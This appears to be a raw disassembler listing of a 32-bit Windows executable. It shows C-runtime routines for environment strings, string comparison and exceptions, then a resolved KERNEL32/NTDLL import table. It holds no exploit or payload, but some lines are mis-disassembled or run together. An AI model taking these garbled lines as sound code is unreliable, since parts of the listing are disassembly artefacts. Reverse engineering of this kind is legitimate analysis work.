add eax, 3
and al, 0FCh
call sub_410BE0
mov [ebp-18h], esp
mov edi, esp
mov [ebp-28h], edi
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_41A970
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
xor ebx, ebx
xor edi, edi
or dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp-20h]
loc_41A970: ; CODE XREF: seg000:0041A95C�j
cmp edi, ebx
jz short loc_41A9A1
push esi
push edi
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push 1
push dword ptr [ebp+20h]
call ds:dword_41C120 ; MultiByteToWideChar
test eax, eax
jz short loc_41A9A1
push esi
push edi
push dword ptr [ebp-1Ch]
push dword ptr [ebp-24h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_41C008 ; CompareStringW
jmp short loc_41A9A3
; ---------------------------------------------------------------------------
loc_41A9A1: ; CODE XREF: seg000:0041A79B�j
; seg000:0041A7FE�j ...
xor eax, eax
loc_41A9A3: ; CODE XREF: seg000:0041A7F7�j
; seg000:0041A826�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9B5 proc near ; CODE XREF: sub_41A654+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_41AA19
push 3Dh
push [ebp+arg_0]
call sub_41ABFB
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_41AA19
cmp [ebp+arg_0], esi
jz short loc_41AA19
mov eax, ds:dword_45F86C
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, ds:dword_45F870
jnz short loc_41A9FF
push eax
call sub_41AB94
pop ecx
mov ds:dword_45F86C, eax
loc_41A9FF: ; CODE XREF: sub_41A9B5+3C�j
cmp eax, edi
jnz short loc_41AA57
cmp [ebp+arg_4], edi
jz short loc_41AA21
cmp ds:dword_45F874, edi
jz short loc_41AA21
call sub_41A654
test eax, eax
jz short loc_41AA57
loc_41AA19: ; CODE XREF: sub_41A9B5+D�j
; sub_41A9B5+22�j ...
or eax, 0FFFFFFFFh
loc_41AA1C: ; CODE XREF: sub_41A9B5+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41AA21: ; CODE XREF: sub_41A9B5+51�j
; sub_41A9B5+59�j
cmp ebx, edi
jnz loc_41AB35
push 4
call sub_410C0F
cmp eax, edi
pop ecx
mov ds:dword_45F86C, eax
jz short loc_41AA19
mov [eax], edi
cmp ds:dword_45F874, edi
jnz short loc_41AA57
push 4
call sub_410C0F
cmp eax, edi
pop ecx
mov ds:dword_45F874, eax
jz short loc_41AA19
mov [eax], edi
loc_41AA57: ; CODE XREF: sub_41A9B5+4C�j
; sub_41A9B5+62�j ...
sub esi, [ebp+arg_0]
mov edi, ds:dword_45F86C
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_41AB3C
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_41AAB7
cmp dword ptr [edi], 0
jz short loc_41AAB7
test ebx, ebx
jz short loc_41AAAF
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_410C83
pop ecx
loc_41AA89: ; CODE XREF: sub_41A9B5+E2�j
cmp dword ptr [edi], 0
jz short loc_41AA99
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_41AA89
; ---------------------------------------------------------------------------
loc_41AA99: ; CODE XREF: sub_41A9B5+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41237F
pop ecx
test eax, eax
pop ecx
jz short loc_41AAE9
jmp short loc_41AAE4
; ---------------------------------------------------------------------------
loc_41AAAF: ; CODE XREF: sub_41A9B5+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_41AAE9
; ---------------------------------------------------------------------------
loc_41AAB7: ; CODE XREF: sub_41A9B5+BD�j
; sub_41A9B5+C2�j
test ebx, ebx
jnz short loc_41AB35
test esi, esi
jge short loc_41AAC1
neg esi
loc_41AAC1: ; CODE XREF: sub_41A9B5+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41237F
pop ecx
test eax, eax
pop ecx
jz loc_41AA19
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_41AAE4: ; CODE XREF: sub_41A9B5+F8�j
mov ds:dword_45F86C, eax
loc_41AAE9: ; CODE XREF: sub_41A9B5+F6�j
; sub_41A9B5+100�j
cmp [ebp+arg_4], 0
jz short loc_41AB35
push [ebp+arg_0]
call sub_410B60
inc eax
inc eax
push eax
call sub_410C0F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_41AB35
push [ebp+arg_0]
push esi
call sub_411B70
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call near ptr 3D0000h
pop ss
push esi
call sub_410C83
pop ecx
loc_41AB35: ; CODE XREF: sub_41A9B5+6E�j
; sub_41A9B5+104�j ...
xor eax, eax
jmp loc_41AA1C
sub_41A9B5 endp
; =============== S U B R O U T I N E =======================================
sub_41AB3C proc near ; CODE XREF: sub_41A9B5+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ds:dword_45F86C
push edi
mov eax, [esi]
test eax, eax
jz short loc_41AB77
mov edi, [esp+8+arg_4]
loc_41AB4E: ; CODE XREF: sub_41AB3C+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_41A615
add esp, 0Ch
test eax, eax
jnz short loc_41AB6D
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_41AB87
test al, al
jz short loc_41AB87
loc_41AB6D: ; CODE XREF: sub_41AB3C+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_41AB4E
loc_41AB77: ; CODE XREF: sub_41AB3C+C�j
mov eax, esi
sub eax, ds:dword_45F86C
sar eax, 2
neg eax
loc_41AB84: ; CODE XREF: sub_41AB3C+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AB87: ; CODE XREF: sub_41AB3C+2B�j
; sub_41AB3C+2F�j
mov eax, esi
sub eax, ds:dword_45F86C
sar eax, 2
jmp short loc_41AB84
sub_41AB3C endp
; =============== S U B R O U T I N E =======================================
sub_41AB94 proc near ; CODE XREF: sub_41A9B5+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_41ABA3
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41ABA3: ; CODE XREF: sub_41AB94+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_41ABB5
loc_41ABAB: ; CODE XREF: sub_41AB94+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_41ABAB
loc_41ABB5: ; CODE XREF: sub_41AB94+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_410C0F
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_41ABD6
push 9
call sub_412ADE
pop ecx
loc_41ABD6: ; CODE XREF: sub_41AB94+38�j
mov eax, [edi]
mov ebx, edi
loc_41ABDA: ; CODE XREF: sub_41AB94+5B�j
test eax, eax
jz short loc_41ABF1
push eax
add ebx, 4
call sub_41AC6E
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_41ABDA
; ---------------------------------------------------------------------------
loc_41ABF1: ; CODE XREF: sub_41AB94+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_41AB94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABFB proc near ; CODE XREF: sub_41A9B5+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_460C7C, 0
jnz short loc_41AC16
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412760
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AC16: ; CODE XREF: sub_41ABFB+A�j
mov ecx, [ebp+arg_0]
loc_41AC19: ; CODE XREF: sub_41ABFB+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_41AC5C
movzx edx, al
test ds:byte_460D81[edx], 4
jz short loc_41AC48
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_41AC53
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_41AC57
jmp short loc_41AC50
; ---------------------------------------------------------------------------
loc_41AC48: ; CODE XREF: sub_41ABFB+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_41AC5C
loc_41AC50: ; CODE XREF: sub_41ABFB+4B�j
inc ecx
jmp short loc_41AC19
; ---------------------------------------------------------------------------
loc_41AC53: ; CODE XREF: sub_41ABFB+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AC57: ; CODE XREF: sub_41ABFB+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AC5C: ; CODE XREF: sub_41ABFB+25�j
; sub_41ABFB+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_41ABFB endp
; =============== S U B R O U T I N E =======================================
sub_41AC6E proc near ; CODE XREF: sub_406C6E+21�p
; sub_41AB94+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41AC95
push esi
call sub_410B60
inc eax
push eax
call sub_410C0F
pop ecx
test eax, eax
pop ecx
jz short loc_41AC95
push esi
push eax
call sub_411B70
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AC95: ; CODE XREF: sub_41AC6E+7�j
; sub_41AC6E+1A�j
xor eax, eax
pop esi
retn
sub_41AC6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41ACA0 proc near ; CODE XREF: sub_402DA4+15�p
; sub_402DFD+15�p ...
mov eax, offset loc_41B194
call sub_4112A0
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_402FA7
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_410B60
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_402FE3
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41ACFA
lea eax, [ebp-3Ch]
push offset dword_41CF60
push eax
mov dword ptr [ebp-3Ch], offset off_41CC1C
call sub_41B0FB
pop esi
sub_41ACA0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41ACFA proc near ; CODE XREF: sub_41ACA0+3F�p
; sub_41AECC+3F�p
mov eax, offset loc_41B1A8
call sub_4112A0
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_42F3E8
call sub_41B020
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_402FA7
push ds:dword_41C228
mov ecx, edi
push 0
push ebx
call sub_402E54
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_41CC3C
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41ACFA endp
; =============== S U B R O U T I N E =======================================
sub_41AD5E proc near ; DATA XREF: seg001:0041CC20�o
; seg001:0041CC40�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_41AD6A
mov eax, offset dword_41C238
locret_41AD6A: ; CODE XREF: sub_41AD5E+5�j
retn
sub_41AD5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD6B proc near ; DATA XREF: seg001:0041CC44�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41ADE1
lea eax, [ebp+var_1C]
push offset dword_41CFD0
push eax
call sub_41B0FB
sub_41AD6B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AD88 proc near ; CODE XREF: seg000:0041ADC8�p
; DATA XREF: seg001:0041CFD4�o
mov eax, offset loc_41B1BC
call sub_4112A0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_41CC3C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_402FA7
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_41B0A7
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41AD88 endp
; ---------------------------------------------------------------------------
loc_41ADC5: ; DATA XREF: seg001:off_41CC3C�o
push esi
mov esi, ecx
call sub_41AD88
test byte ptr [esp+8], 1
jz short loc_41ADDB
push esi
call sub_4112BF
pop ecx
loc_41ADDB: ; CODE XREF: seg000:0041ADD2�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_41ADE1 proc near ; CODE XREF: sub_41AD6B+A�p
; sub_41AEB4+7�p ...
mov eax, offset loc_41B1D0
call sub_4112A0
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_41B05D
mov al, [ebx+0Ch]
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov ecx, edi
mov [edi], al
call sub_402FA7
push ds:dword_41C228
mov ecx, edi
push 0
push ebx
call sub_402E54
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_41CC3C
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41ADE1 endp
; =============== S U B R O U T I N E =======================================
sub_41AE3E proc near ; CODE XREF: sub_41AE7B+20�p
; DATA XREF: seg001:0041CF64�o
mov eax, offset loc_41B1E4
call sub_4112A0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_41CC3C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_402FA7
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_41B0A7
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41AE3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE7B proc near ; DATA XREF: seg001:0041CC24�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41AEB4
lea eax, [ebp+var_1C]
push offset dword_41CF60
push eax
call sub_41B0FB
loc_41AE98: ; DATA XREF: seg001:off_41CC1C�o
push esi
mov esi, ecx
call sub_41AE3E
test [esp+20h+var_18], 1
jz short loc_41AEAE
push esi
call sub_4112BF
pop ecx
loc_41AEAE: ; CODE XREF: sub_41AE7B+2A�j
mov eax, esi
pop esi
retn 4
sub_41AE7B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AEB4 proc near ; CODE XREF: sub_41AE7B+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41ADE1
mov dword ptr [esi], offset off_41CC1C
mov eax, esi
pop esi
retn 4
sub_41AEB4 endp
; =============== S U B R O U T I N E =======================================
sub_41AECC proc near ; CODE XREF: sub_402E54+13�p
; sub_403018+E�p
mov eax, offset loc_41B1F8
call sub_4112A0
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_402FA7
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_410B60
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_402FE3
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41ACFA
lea eax, [ebp-3Ch]
push offset dword_41D088
push eax
mov dword ptr [ebp-3Ch], offset off_41CC4C
call sub_41B0FB
pop esi
sub_41AECC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AF26 proc near ; CODE XREF: sub_41AF63+20�p
; DATA XREF: seg001:0041D08C�o
mov eax, offset loc_41B20C
call sub_4112A0
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_41CC3C
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_402FA7
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_41B0A7
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41AF26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF63 proc near ; DATA XREF: seg001:0041CC54�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41AF9C
lea eax, [ebp+var_1C]
push offset dword_41D088
push eax
call sub_41B0FB
loc_41AF80: ; DATA XREF: seg001:off_41CC4C�o
push esi
mov esi, ecx
call sub_41AF26
test [esp+20h+var_18], 1
jz short loc_41AF96
push esi
call sub_4112BF
pop ecx
loc_41AF96: ; CODE XREF: sub_41AF63+2A�j
mov eax, esi
pop esi
retn 4
sub_41AF63 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AF9C proc near ; CODE XREF: sub_41AF63+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41ADE1
mov dword ptr [esi], offset off_41CC4C
mov eax, esi
pop esi
retn 4
sub_41AF9C endp
; ---------------------------------------------------------------------------
test ds:byte_45FB30, 1
jnz short loc_41AFC4
or ds:byte_45FB30, 1
loc_41AFC4: ; CODE XREF: seg000:0041AFBB�j
call sub_41AFDE
test ds:byte_460EB8, 1
jnz short loc_41AFD9
or ds:byte_460EB8, 1
loc_41AFD9: ; CODE XREF: seg000:0041AFD0�j
jmp loc_41AFEA
; =============== S U B R O U T I N E =======================================
sub_41AFDE proc near ; CODE XREF: seg000:loc_41AFC4�p
push offset nullsub_1
call sub_411680
pop ecx
retn
sub_41AFDE endp
; ---------------------------------------------------------------------------
loc_41AFEA: ; CODE XREF: seg000:loc_41AFD9�j
push offset nullsub_1
call sub_411680
pop ecx
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41AFF8 proc near ; CODE XREF: sub_4026F4+5E�p
; sub_40318D+159�p
jmp ds:dword_41C1B4
sub_41AFF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41AFFE proc near ; CODE XREF: sub_410F0C+23�p
; sub_4111B0+13�p
jmp ds:dword_41C13C
sub_41AFFE endp
; =============== S U B R O U T I N E =======================================
sub_41B004 proc near ; DATA XREF: seg001:off_41CC74�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41B0A7
test [esp+4+arg_0], 1
jz short loc_41B01A
push esi
call sub_4112BF
pop ecx
loc_41B01A: ; CODE XREF: sub_41B004+D�j
mov eax, esi
pop esi
retn 4
sub_41B004 endp
; =============== S U B R O U T I N E =======================================
sub_41B020 proc near ; CODE XREF: sub_41ACFA+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_41CC74
push dword ptr [edi]
call sub_410B60
inc eax
push eax
call sub_411605
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_41B04F
push dword ptr [edi]
push eax
call sub_411B70
pop ecx
pop ecx
loc_41B04F: ; CODE XREF: sub_41B020+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_41B020 endp
; =============== S U B R O U T I N E =======================================
sub_41B05D proc near ; CODE XREF: sub_41ADE1+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_41CC74
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_41B09A
push dword ptr [edi+4]
call sub_410B60
inc eax
push eax
call sub_411605
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_41B0A0
push dword ptr [edi+4]
push eax
call sub_411B70
pop ecx
pop ecx
jmp short loc_41B0A0
; ---------------------------------------------------------------------------
loc_41B09A: ; CODE XREF: sub_41B05D+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_41B0A0: ; CODE XREF: sub_41B05D+2E�j
; sub_41B05D+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_41B05D endp
; =============== S U B R O U T I N E =======================================
sub_41B0A7 proc near ; CODE XREF: sub_41AD88+2B�p
; sub_41AE3E+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41CC74
jz short locret_41B0BC
push dword ptr [ecx+4]
call sub_4112BF
pop ecx
locret_41B0BC: ; CODE XREF: sub_41B0A7+A�j
retn
sub_41B0A7 endp
; =============== S U B R O U T I N E =======================================
sub_41B0BD proc near ; DATA XREF: seg001:0041CC78�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_41B0C9
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_41B0C9: ; CODE XREF: sub_41B0BD+5�j
retn
sub_41B0BD endp
; =============== S U B R O U T I N E =======================================
sub_41B0CA proc near ; CODE XREF: seg000:0041B0E2�p
mov dword ptr [ecx], offset off_41CC94
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_41B0DE
push ecx
call sub_410C83
pop ecx
locret_41B0DE: ; CODE XREF: sub_41B0CA+B�j
retn
sub_41B0CA endp
; ---------------------------------------------------------------------------
loc_41B0DF: ; DATA XREF: seg001:off_41CC94�o
push esi
mov esi, ecx
call sub_41B0CA
test byte ptr [esp+8], 1
jz short loc_41B0F5
push esi
call sub_4112BF
pop ecx
loc_41B0F5: ; CODE XREF: seg000:0041B0EC�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0FB proc near ; CODE XREF: sub_41ACA0+54�p
; sub_41AD6B+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41CC98
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_41C16C ; RaiseException
pop edi
pop esi
leave
retn 8
sub_41B0FB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_41B138 proc near ; DATA XREF: seg001:0041CE64�o
; FUNCTION CHUNK AT 00402D9C SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_402D9C
sub_41B138 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_41B156
mov ecx, [ebp+8]
jmp loc_402D9C
; ---------------------------------------------------------------------------
locret_41B156: ; CODE XREF: seg000:0041B148�j
retn
; ---------------------------------------------------------------------------
loc_41B157: ; DATA XREF: sub_402930�o
mov eax, offset dword_41CE38
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_402D9C
; ---------------------------------------------------------------------------
loc_41B16C: ; DATA XREF: seg001:0041CE94�o
lea ecx, [ebp-1Ch]
jmp loc_402D9C
; ---------------------------------------------------------------------------
loc_41B174: ; DATA XREF: sub_402AD2�o
mov eax, offset dword_41CE68
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 10h
loc_41B180: ; DATA XREF: sub_40307F�o
mov eax, offset dword_41CE98
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_402D9C
; ---------------------------------------------------------------------------
loc_41B194: ; DATA XREF: sub_41ACA0�o
mov eax, offset dword_41CF70
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
jmp sub_41B0A7
; ---------------------------------------------------------------------------
loc_41B1A8: ; DATA XREF: sub_41ACFA�o
mov eax, offset dword_41CF98
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_41B0A7
; ---------------------------------------------------------------------------
loc_41B1BC: ; DATA XREF: sub_41AD88�o
mov eax, offset dword_41CFE0
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_41B0A7
; ---------------------------------------------------------------------------
loc_41B1D0: ; DATA XREF: sub_41ADE1�o
mov eax, offset dword_41D008
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_41B0A7
; ---------------------------------------------------------------------------
loc_41B1E4: ; DATA XREF: sub_41AE3E�o
mov eax, offset dword_41D030
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-20h]
jmp loc_402D9C
; ---------------------------------------------------------------------------
loc_41B1F8: ; DATA XREF: sub_41AECC�o
mov eax, offset dword_41D098
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_41B0A7
; ---------------------------------------------------------------------------
loc_41B20C: ; DATA XREF: sub_41AF26�o
mov eax, offset dword_41D0C0
jmp loc_410F5B
; ---------------------------------------------------------------------------
align 1000h
seg000 ends
; Section 2. (virtual address 0001C000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0001C000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 41C000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_41C000 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_411914+D�r
dd 7C833478h
dword_41C008 dd 7C80A35Eh ; resolved to->KERNEL32.CompareStringW ; seg000:0041A999�r
dword_41C00C dd 7C80D077h ; resolved to->KERNEL32.CompareStringA ; seg000:0041A7F1�r
dd 7C832044h, 7C812641h, 7C81DC03h, 7C80BCCFh, 7C809E01h
dword_41C024 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; seg000:00418979�r
dword_41C028 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW dd 7C838A0Ch, 7C810E51h, 7C812F39h, 7C80CC97h
dword_41C03C dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_41C040 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; seg000:00417941�r
dword_41C044 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsW dd 7C80C058h
dword_41C04C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; seg000:00401C13�r ...
dd 7C80A427h, 7C82FA46h
dword_41C058 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40380D+6E�r ...
dd 7C80B4CFh, 7C83632Dh, 7C8361EEh
dword_41C068 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; seg000:loc_405136�r ...
dword_41C06C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; seg000:00405108�r ...
dword_41C070 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4047B6+B2�r ...
dd 7C810A77h
dword_41C078 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_4047B6+25�r ...
dword_41C07C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_4089FD+290�r ...
dd 7C80EDD7h, 7C80E7ECh, 7C80E866h
dword_41C08C dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_404134+5D7�r
dword_41C090 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_41C094 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_4165C4+84�r ...
dword_41C098 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_4169A2+4F�r
dword_41C09C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_41C0A0 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_41C0A4 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_41C0A8 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_40550F+443�r
dword_41C0AC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_405D8E:loc_406224�r ...
